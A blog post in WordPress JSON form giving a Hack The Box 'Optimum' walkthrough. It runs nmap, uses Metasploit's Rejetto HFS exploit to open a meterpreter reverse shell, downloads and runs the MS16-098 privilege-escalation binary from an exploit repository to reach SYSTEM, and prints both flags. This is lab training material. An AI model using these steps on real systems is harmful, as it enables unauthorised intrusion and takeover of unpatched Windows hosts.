{"id":3714,"date":"2020-08-08T14:26:03","date_gmt":"2020-08-08T05:26:03","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3714"},"modified":"2020-08-30T23:34:55","modified_gmt":"2020-08-30T14:34:55","slug":"hack-the-box-optimum-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3714","title":{"rendered":"Hack The Box &#8211; Optimum &#8211; Walkthrough"},"content":{"rendered":"<h3>This time I opened two ports<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\ndocker run -p 1234:1234 -p 8080:8080 -t -i htb \/bin\/bash\r\n<\/pre>\n<h3>We can see that HFS is running<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# nmap -A -n -F -T5 optimum.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-05 14:29 UTC\r\nNmap scan report for optimum.htb (10.10.10.8)\r\nHost is up (0.042s latency).\r\nNot shown: 99 filtered ports\r\nPORT   STATE SERVICE VERSION\r\n80\/tcp open  http    HttpFileServer httpd 2.3\r\n|_http-server-header: HFS 2.3\r\n|_http-title: HFS \/\r\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\r\nDevice type: print server|printer\r\nRunning: HP embedded\r\nOS CPE: cpe:\/h:hp:jetdirect_170x cpe:\/h:hp:inkjet_3000\r\nOS details: HP 170X print server or Inkjet 3000 printer, HP LaserJet 4250 printer\r\nNetwork Distance: 2 hops\r\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\r\n<\/pre>\n<h3>Attacking the HFS vulnerability with msfconsole<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# msfconsole\r\n\r\n               .;lxO0KXXXK0Oxl:.\r\n           ,o0WMMMMMMMMMMMMMMMMMMKd,\r\n        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,\r\n      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:\r\n    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,\r\n   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo\r\n  xMMMMMMMMMMWd.           
    .oNMMMMMMMMMMk\r\n oMMMMMMMMMMx.                    dMMMMMMMMMMx\r\n.WMMMMMMMMM:                       :MMMMMMMMMM,\r\nxMMMMMMMMMo                         lMMMMMMMMMO\r\nNMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;\r\nMMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:\r\nNMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:\r\nxMMMMMMMMMd                        ,0MMMMMMMMMMK;\r\n.WMMMMMMMMMc                         'OMMMMMM0,\r\n lMMMMMMMMMMk.                         .kMMO'\r\n  dMMMMMMMMMMWd'                         ..\r\n   cWMMMMMMMMMMMNxc'.                ##########\r\n    .0MMMMMMMMMMMMMMMMWc            #+#    #+#\r\n      ;0MMMMMMMMMMMMMMMo.          +:+\r\n        .dNMMMMMMMMMMMMo          +#++:++#+\r\n           'oOWMMMMMMMMo                +:+\r\n               .,cdkO0K;        :+:    :+:\r\n                                :::::::+:\r\n                      Metasploit\r\n\r\n       =&#x5B; metasploit v5.0.100-dev                         ]\r\n+ -- --=&#x5B; 2046 exploits - 1106 auxiliary - 344 post       ]\r\n+ -- --=&#x5B; 562 payloads - 45 encoders - 10 nops            ]\r\n+ -- --=&#x5B; 7 evasion                                       ]\r\n\r\nMetasploit tip: You can upgrade a shell to a Meterpreter session on many platforms using sessions -u &lt;session_id&gt;\r\n\r\nmsf5 &gt; search hfs\r\n\r\nMatching Modules\r\n================\r\n\r\n   #  Name                                        Disclosure Date  Rank       Check  Description\r\n   -  ----                                        ---------------  ----       -----  -----------\r\n   0  exploit\/multi\/http\/git_client_command_exec  2014-12-18       excellent  No     Malicious Git and Mercurial HTTP Server For CVE-2014-9390\r\n   1  exploit\/windows\/http\/rejetto_hfs_exec       2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution\r\n\r\n\r\nInteract with a module by name or index, for example use 1 or use 
exploit\/windows\/http\/rejetto_hfs_exec\r\n\r\nmsf5 &gt; use 1\r\n&#x5B;*] No payload configured, defaulting to windows\/meterpreter\/reverse_tcp\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; show options\r\n\r\nModule options (exploit\/windows\/http\/rejetto_hfs_exec):\r\n\r\n   Name       Current Setting  Required  Description\r\n   ----       ---------------  --------  -----------\r\n   HTTPDELAY  10               no        Seconds to wait before terminating web server\r\n   Proxies                     no        A proxy chain of format type:host:port&#x5B;,type:host:port]&#x5B;...]\r\n   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:&lt;path&gt;'\r\n   RPORT      80               yes       The target port (TCP)\r\n   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.\r\n   SRVPORT    8080             yes       The local port to listen on.\r\n   SSL        false            no        Negotiate SSL\/TLS for outgoing connections\r\n   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)\r\n   TARGETURI  \/                yes       The path of the web application\r\n   URIPATH                     no        The URI to use for this exploit (default is random)\r\n   VHOST                       no        HTTP server virtual host\r\n\r\n\r\nPayload options (windows\/meterpreter\/reverse_tcp):\r\n\r\n   Name      Current Setting  Required  Description\r\n   ----      ---------------  --------  -----------\r\n   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)\r\n   LHOST     172.17.0.2       yes       The listen address (an interface may be specified)\r\n   LPORT     4444             yes       The listen port\r\n\r\n\r\nExploit target:\r\n\r\n   Id  Name\r\n   --  ----\r\n   0   
Automatic\r\n\r\n\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; set RHOSTS optimum.htb\r\nRHOSTS =&gt; optimum.htb\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; set LHOST 10.10.14.6\r\nLHOST =&gt; 10.10.14.14\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; set LPORT 1234\r\nLPORT =&gt; 1234\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; exploit\r\n\r\n&#x5B;-] Handler failed to bind to 10.10.14.14:1234:-  -\r\n&#x5B;*] Started reverse TCP handler on 0.0.0.0:1234\r\n&#x5B;*] Using URL: http:\/\/0.0.0.0:8080\/JaNzZ3CB\r\n&#x5B;*] Local IP: http:\/\/172.17.0.2:8080\/JaNzZ3CB\r\n&#x5B;*] Server started.\r\n&#x5B;*] Sending a malicious request to \/\r\n\/usr\/share\/metasploit-framework\/modules\/exploits\/windows\/http\/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete\r\n\/usr\/share\/metasploit-framework\/modules\/exploits\/windows\/http\/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete\r\n&#x5B;*] Payload request received: \/JaNzZ3CB\r\n&#x5B;*] Sending stage (176195 bytes) to 172.17.0.1\r\n&#x5B;*] Meterpreter session 1 opened (172.17.0.2:1234 -&gt; 172.17.0.1:46836) at 2020-08-05 16:23:53 +0000\r\n&#x5B;*] Server stopped.\r\n&#x5B;!] This exploit may require manual cleanup of '%TEMP%\\ZOcsozkNyOEfb.vbs' on the target\r\n\r\nmeterpreter &gt;\r\n&#x5B;!] Tried to delete %TEMP%\\ZOcsozkNyOEfb.vbs, unknown result\r\ngetuid\r\nServer username: OPTIMUM\\kostas\r\n\r\nmeterpreter &gt; shell\r\nProcess 1324 created.\r\nChannel 2 created.\r\nMicrosoft Windows &#x5B;Version 6.3.9600]\r\n(c) 2013 Microsoft Corporation. 
All rights reserved.\r\n\r\nC:\\Users\\kostas\\Desktop&gt;type user.txt.txt\r\ntype user.txt.txt\r\nd0c39409d7b994a9a1389ebf38ef5f73\r\n<\/pre>\n<h3>Using Windows-Exploit-Suggester to look for vulnerabilities<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nmeterpreter &gt; execute -f &quot;cmd.exe \/c systeminfo &gt; systeminfo.txt&quot;\r\nProcess 3604 created.\r\nmeterpreter &gt; download systeminfo.txt\r\n&#x5B;*] Downloading: systeminfo.txt -&gt; systeminfo.txt\r\n&#x5B;*] Downloaded 3.26 KiB of 3.26 KiB (100.0%): systeminfo.txt -&gt; systeminfo.txt\r\n&#x5B;*] download   : systeminfo.txt -&gt; systeminfo.txt\r\nmeterpreter &gt; bg\r\n&#x5B;*] Backgrounding session 1..\r\n\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; git clone https:\/\/github.com\/GDSSecurity\/Windows-Exploit-Suggester.git\r\n&#x5B;*] exec: git clone https:\/\/github.com\/GDSSecurity\/Windows-Exploit-Suggester.git\r\n\r\nCloning into 'Windows-Exploit-Suggester'...\r\nremote: Enumerating objects: 120, done.\r\nremote: Total 120 (delta 0), reused 0 (delta 0), pack-reused 120\r\nReceiving objects: 100% (120\/120), 169.26 KiB | 365.00 KiB\/s, done.\r\nResolving deltas: 100% (72\/72), done.\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; cd Windows-Exploit-Suggester\/\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; python2 windows-exploit-suggester.py --update\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo systeminfo.txt --quiet\r\n&#x5B;*] exec: python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo systeminfo.txt --quiet\r\n\r\n&#x5B;*] initiating winsploit version 3.3...\r\n&#x5B;*] database file detected as xls or xlsx based on extension\r\n&#x5B;-] please install and upgrade the python-xlrd library\r\n\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; apt install python-pip\r\nmsf5 
exploit(windows\/http\/rejetto_hfs_exec) &gt; python -m pip install xlrd --upgrade\r\n...\r\nInstalling collected packages: xlrd\r\nSuccessfully installed xlrd-1.2.0\r\n\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; vi systeminfo.txt\r\n\u203b Part of the file was garbled (mojibake) and could not be processed correctly, so I deleted the garbled portion \u203b\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo systeminfo.txt --quiet\r\n&#x5B;*] exec: python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo systeminfo.txt --quiet\r\n\r\n&#x5B;*] initiating winsploit version 3.3...\r\n&#x5B;*] database file detected as xls or xlsx based on extension\r\n&#x5B;*] attempting to read from the systeminfo input file\r\n&#x5B;+] systeminfo input file read successfully (utf-8)\r\n&#x5B;*] querying database file for potential vulnerabilities\r\n&#x5B;*] comparing the 32 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits\r\n&#x5B;*] there are now 246 remaining vulns\r\n&#x5B;+] &#x5B;E] exploitdb PoC, &#x5B;M] Metasploit module, &#x5B;*] missing bulletin\r\n&#x5B;+] windows version identified as 'Windows 2012 R2 64-bit'\r\n&#x5B;*]\r\n&#x5B;E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important\r\n&#x5B;E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important\r\n&#x5B;M] MS16-075: Security Update for Windows SMB Server (3164038) - Important\r\n&#x5B;E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important\r\n&#x5B;E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical\r\n&#x5B;E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important\r\n&#x5B;M] MS16-016: Security Update for WebDAV to 
Address Elevation of Privilege (3136041) - Important\r\n&#x5B;E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important\r\n&#x5B;E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important\r\n&#x5B;E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important\r\n&#x5B;E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical\r\n&#x5B;E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important\r\n&#x5B;E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important\r\n&#x5B;E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical\r\n&#x5B;M] MS15-078: Vulnerability in Microsoft Font Driver Could Allow Remote Code Execution (3079904) - Critical\r\n&#x5B;E] MS15-052: Vulnerability in Windows Kernel Could Allow Security Feature Bypass (3050514) - Important\r\n&#x5B;M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important\r\n&#x5B;E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical\r\n&#x5B;E] MS15-001: Vulnerability in Windows Application Compatibility Cache Could Allow Elevation of Privilege (3023266) - Important\r\n&#x5B;E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical\r\n&#x5B;M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical\r\n&#x5B;M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important\r\n&#x5B;M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical\r\n&#x5B;E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of 
Privilege (2880430) - Important\r\n&#x5B;M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical\r\n&#x5B;*] done\r\n<\/pre>\n<h3>Using MS16-098 as the starting point to obtain administrator privileges<\/h3>\n<p>Search for \"MS16-098 exploit\" to find the exploit.<br \/>\n<a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_135818.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_135818-300x234.png\" alt=\"\" width=\"300\" height=\"234\" class=\"alignnone size-medium wp-image-3715\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_135818-300x234.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_135818-1024x797.png 1024w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_135818-768x598.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_135818-1536x1196.png 1536w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_135818.png 1965w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; wget -d https:\/\/github.com\/offensive-security\/exploitdb-bin-sploits\/raw\/master\/bin-sploits\/41020.exe\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; sessions\r\n\r\nActive sessions\r\n===============\r\n\r\n  Id  Name  Type                     Information               Connection\r\n  --  ----  ----                     -----------               ----------\r\n  1         meterpreter x86\/windows  OPTIMUM\\kostas @ OPTIMUM  172.17.0.2:1234 -&gt; 172.17.0.1:48926 (10.10.10.8)\r\n\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; sessions -i 1\r\n&#x5B;*] Starting interaction with 1...\r\n\r\nmeterpreter &gt; upload 
41020.exe\r\n&#x5B;*] uploading  : 41020.exe -&gt; 41020.exe\r\n&#x5B;*] Uploaded 547.00 KiB of 547.00 KiB (100.0%): 41020.exe -&gt; 41020.exe\r\n&#x5B;*] uploaded   : 41020.exe -&gt; 41020.exe\r\n\r\nmeterpreter &gt; shell\r\nProcess 1100 created.\r\nChannel 5 created.\r\nMicrosoft Windows &#x5B;Version 6.3.9600]\r\n(c) 2013 Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Users\\kostas\\Desktop&gt;41020.exe\r\n41020.exe\r\nMicrosoft Windows &#x5B;Version 6.3.9600]\r\n(c) 2013 Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Users\\kostas\\Desktop&gt;whoami\r\nwhoami\r\nnt authority\\system\r\n\r\nC:\\Users\\kostas\\Desktop&gt;type C:\\Users\\Administrator\\Desktop\\root.txt\r\ntype C:\\Users\\Administrator\\Desktop\\root.txt\r\n51ed1b36553c8461f4552c2e92b3eeed\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>This time I opened two ports docker run -p 1234:1234 -p 8080:8080 -t -i htb \/bin\/bash We can see that HFS is running # nmap -A -n -F -T5 opt 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3714"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3714"}],"version-history":[{"count":2,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3714\/revisions"}],"predecessor-version":[{"id":3790,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3714\/revisions\/3790"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3714"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3714"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3714"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}